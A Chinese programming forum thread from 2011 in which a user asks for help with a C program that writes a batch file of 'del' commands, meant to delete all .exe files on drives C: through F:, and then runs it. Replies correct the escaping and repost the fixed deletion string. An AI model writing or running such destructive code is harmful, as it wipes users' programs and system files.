| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 627 人关注过本帖
标题:一个文件问题 出了点问题
只看楼主 加入收藏
那年
Rank: 3Rank: 3
来 自:湖南
等 级:论坛游侠
帖 子:83
专家分:141
注 册:2011-5-3
结帖率:57.14%
收藏
已结贴  问题点数:40 回复次数:11 
一个文件问题 出了点问题
程序代码:
#include"stdio.h"
#include"stdlib.h"
main()
{
    FILE *fp;
    char a[100]={"del -f-s-q c:\ *.exe del -f-s-q \n d:\ *.exe del -f-s-q e:\ *.exe del -f-s-q f:\ *.exe"};
    fp=fopen("1.bat","w");
    fputs(a,fp);
    fclose(fp);
    system("1.bat");
}

个把月没来了   先打声招呼!

大家看我程序代码基本知道我做什么啦  

 用一个数组保存要写入1.bat的内容(我这里用的空格   回车在字符串中能够实现吗?)

再利用写操作创建一个1.bat

用fputs写入

然后运行

不知哪步错了

哪个大神帮我找出来

代码就几句

搜索更多相关主题的帖子: color 
2011-06-14 09:25
fragileeye
Rank: 5Rank: 5
等 级:职业侠客
威 望:2
帖 子:107
专家分:387
注 册:2011-5-21
收藏
得分:7 
字符串中'\'用"\\"
char a[100]={"del -f-s-q c:\\ *.exe del -f-s-q \n d:\\ *.exe del -f-s-q e:\\ *.exe del -f-s-q f:\\ *.exe"};
2011-06-14 09:45
那年
Rank: 3Rank: 3
来 自:湖南
等 级:论坛游侠
帖 子:83
专家分:141
注 册:2011-5-3
收藏
得分:0 
回复 2楼 fragileeye
E      朋友  这里的  \   是路径 - -


              人生莫大的悲哀是不能坚持,今天计划明天,明天念着后天,这样总难成事。
2011-06-14 09:52
voidx
Rank: 12Rank: 12Rank: 12
来 自:邯郸
等 级:火箭侠
帖 子:1250
专家分:3538
注 册:2011-4-7
收藏
得分:7 
回复 3楼 那年
二楼说的是对的
不管 '\' 是干啥用的,作为一个字符出现在字符串里的时候必须转义,也就是写成 '\\'。
而且这里可以用 '/' 代替路径中的 '\\'

还有,楼主这样写出来的 bat 好像有问题,你最后得到的 bat 的内容是这样的:

del -f-s-q c:\ *.exe del -f-s-q
 d:\ *.exe del -f-s-q e:\ *.exe del -f-s-q f:\ *.exe

[ 本帖最后由 voidx 于 2011-6-14 11:15 编辑 ]
2011-06-14 11:13
jklfds123
Rank: 1
等 级:新手上路
帖 子:1
专家分:7
注 册:2011-6-14
收藏
得分:7 
果然难啊

湖州招聘网http://www.hzgz.cc 南浔人才网http://www.
2011-06-14 12:03
Qingtian_2
Rank: 2
来 自:天津
等 级:论坛游民
帖 子:50
专家分:96
注 册:2011-3-9
收藏
得分:7 
这中做法有什么实际意义呢?
2011-06-14 12:07
烟雾中的迷茫
Rank: 9Rank: 9Rank: 9
等 级:蜘蛛侠
帖 子:621
专家分:1069
注 册:2011-2-9
收藏
得分:7 
回复 5楼 C小易
楼主漏了吧 fwrite(str,sizeof(),n,fp)
2011-06-14 16:43
那年
Rank: 3Rank: 3
来 自:湖南
等 级:论坛游侠
帖 子:83
专家分:141
注 册:2011-5-3
收藏
得分:0 
回复 4楼 voidx
   这个我还真是不注意   谢谢哈     我也想写成回车的  字符串里这里能够用\n吗?


              人生莫大的悲哀是不能坚持,今天计划明天,明天念着后天,这样总难成事。
2011-06-14 21:13
那年
Rank: 3Rank: 3
来 自:湖南
等 级:论坛游侠
帖 子:83
专家分:141
注 册:2011-5-3
收藏
得分:0 
回复 8楼 烟雾中的迷茫
五楼的是对的   不过我没用这个   只是不想用n去确定字符个数


              人生莫大的悲哀是不能坚持,今天计划明天,明天念着后天,这样总难成事。
2011-06-14 21:14
那年
Rank: 3Rank: 3
来 自:湖南
等 级:论坛游侠
帖 子:83
专家分:141
注 册:2011-5-3
收藏
得分:0 
继续求解   大家可以把程序改下   好的可以帖上来


              人生莫大的悲哀是不能坚持,今天计划明天,明天念着后天,这样总难成事。
2011-06-15 12:57
快速回复:一个文件问题 出了点问题
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.012339 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved